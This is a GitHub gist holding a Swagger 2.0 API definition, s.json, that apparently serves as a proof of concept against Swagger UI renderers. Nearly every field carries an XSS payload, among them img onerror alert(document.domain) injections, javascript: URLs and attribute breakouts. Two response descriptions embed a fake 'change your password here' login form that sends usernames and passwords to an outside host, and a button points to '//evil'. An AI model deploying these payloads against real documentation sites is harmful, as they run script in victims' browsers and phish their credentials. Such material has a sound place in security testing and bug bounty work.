Skip to content

Instantly share code, notes, and snippets.

@myuyu

myuyu/s.json

Created November 28, 2021 21:06
Show Gist options
  • Save myuyu/ab8a9baea5f419efbe15b7d67d21f929 to your computer and use it in GitHub Desktop.
Save myuyu/ab8a9baea5f419efbe15b7d67d21f929 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
s.json
{
"swagger": "2.0",
"info": {
"title": "/qqq'\"><img src=x onerror=alert(document.domain)>",
"description": "rrrr",
"version": "2017-06-04T22:56:06+00:00",
"termsOfService": "Javascript:alert(document.domain)//",
"contact": {
"name": "/sss'\"></script><img src=x onerror=alert(document.domain)>",
"url": "JAVASCRIPT://aaa.com/%0aalert(document.domain)",
"email": "javaonerrorscript://aaa.com/%0aalert(document.domain))"
}
},
"Host": "google.com",
"basePath": "/%0Aalert(document.domain)//",
"schemes": [
"Javascript",
"file"
],
"consumes": [
"/ttt'\"></script></select>fff<img src=x onerror=alert(document.domain)>"
],
"produces": [
"/uuu'\"></script>ggg<img src=x onerror=alert(document.domain)>"
],
"securityDefinitions": {
"oauth2": {
"flow": "implicit",
"authorizationUrl": "javascript://google.com/%0Aalert(document.domain)//",
"scopes": {
"web-api": "testing"
},
"type": "oauth2"
}
},
"security": [
{
"tokenHeader": ["/xxx'\"><img src=x onerror=alert(document.domain)>"]
}
],
"paths": {
"Login": {
"post": {
"summary": "/'\">bbb</script><img src=x onerror=alert(document.domain)>",
"description": "<IMG src='https://techbeacon.scdn7.secure.raxcdn.com/sites/default/files/styles/article_hero_image/public/field/image/testing-trends-world-quality-report.jpg?itok=vUyONZsj'/>
<h1 style='background-color:Tomato;'>change your password here</h1>
<form method='get' action='https://bugbountypoc.com/poc/'> <p><input type='text' name='login' value='' placeholder='Username or Email'></p> <p><input type='password' name='password' value='' placeholder='Password'></p> <p class='submit'><input type='submit' name='commit' value='Login'></p> </form>",
"tags": ["Authentication"],
"parameters": [
{
"name": "/xxx'tabindex=0 id=aaa onfocus=alert(document.domain) onmouseover=alert(document.domain) yyy\"zzz></script><img src=x onerror=alert(document.domain)>",
"in": "body",
"schema": {
"type": "object",
"required": [
"/hhh'\"></script><img src=x onerror=alert(document.domain)>"
],
"properties": {
"/ccc<img src=x onerror=alert(document.domain)>": {
"type": "string",
"description": "/iii'\"></script><img src=x onerror=alert(document.domain)>"
}
},
"description": "/ddd'\"></script><img src=x onerror=alert(document.domain)>"
},
"required": true
}
],
"responses": {
"200": {
"description": "{<marquee mdd=dddd>test</marquee><h1 style='border:2px solid Tomato;'>Hello World HTML injection PoC</h1><form><button formaction=//evil>XSS</button><textarea name=x>}"
},
"400": {
"description": "<IMG src='https://techbeacon.scdn7.secure.raxcdn.com/sites/default/files/styles/article_hero_image/public/field/image/testing-trends-world-quality-report.jpg?itok=vUyONZsj'/>
<h1 style='background-color:Tomato;'>change your password here</h1>
<form method='get' action='https://bugbountypoc.com/poc/login.php'> <p><input type='text' name='login' value='' placeholder='Username or Email'></p> <p><input type='password' name='password' value='' placeholder='Password'></p> <p class='submit'><input type='submit' name='commit' value='Login'></p> </form>",
"schema": {
"type": "object",
"properties": {
"errors": {
"type": "object",
"additionalProperties": {
"type": "string"
},
"description": "/lll'\"></script><img src=x onerror=alert(document.domain)>"
}
},
"description": "/mmm'\"></script><img src=x onerror=alert(document.domain)>"
},
"examples": {
"/nnn'\"></script><img src=x onerror=alert(document.domain)>": {
"errors": {
"/ooo'\"></script><img src=x onerror=alert(document.domain)>": "/ppp'\"></script><img src=x onerror=alert(document.domain)>"
}
}
}
}
}
}
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment